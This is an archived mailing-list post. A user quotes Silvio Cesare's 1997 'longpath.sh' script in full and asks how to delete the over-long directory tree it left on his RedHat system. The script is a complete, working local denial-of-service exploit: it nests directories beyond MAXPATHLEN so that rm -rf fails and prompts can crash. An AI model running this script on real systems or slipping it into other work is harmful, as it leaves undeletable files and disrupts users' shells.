There is a nice small shell script at www.rootshell.com, longpath.sh, wich exploits some bug in Linux about long pathnames... Here's the program: # Problem: Long pathnames are possible (> MAXPATHLEN) by creating directory # trees relatively, causing various problems on the system. # # May 27, 1997 # # Systems: Linux, probably some other unix's also. # # rm -rf will fail to remove it, as rm -rf will try to remove it using absolut # pathnames which are long. If the current directory is in the prompt, then # this overflows, typically crashing the shell. Any programs that use absolut # pathnames will have problems. # # # Silvio Cesare # # # The longpath attack implementation.. # #!/bin/sh # # Implementation of the longpath attack # Silvio Cesare, 1997 LENGTH=128 HEIGHT=32 ROOT=longpath CHAR=A set -- `getopt h:l:r:c: $*` if test $? != 0 then echo usage: longpath [-h height] [-l length] [-r root] [-c char] exit 1 fi for i do case "$i" in -h) HEIGHT=$2 shift; shift ;; -l) LENGTH=$2 shift; shift ;; -r) ROOT=$2 shift; shift ;; -c) CHAR=$2 shift; shift ;; --) shift break ;; esac done NAME="" i=0 while test $i -lt $LENGTH do NAME=$NAME$CHAR i=`expr $i + 1` done mkdir $ROOT cd $ROOT i=0 while test $i -lt $HEIGHT do mkdir $NAME cd $NAME i=`expr $i + 1` done I heard that it is possible to erase it with mc (Midnight Commander). Well, I can tell you' this ISN'T true ;-) I tried the script on a RedHat Linux, and... well... I can't erase the directory now ;-) I wonder if anyone of you knows the problem, and can help me with that.. 10x ____________________________________________________________________ |Szekely-Benczedi Endre 4339 Vargata nr.99, jud. Mures, ROMANIA| |E-mail: eszekelyat_private WWW: http://www.uttgm.ro/~eszekely| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:33:58 PDT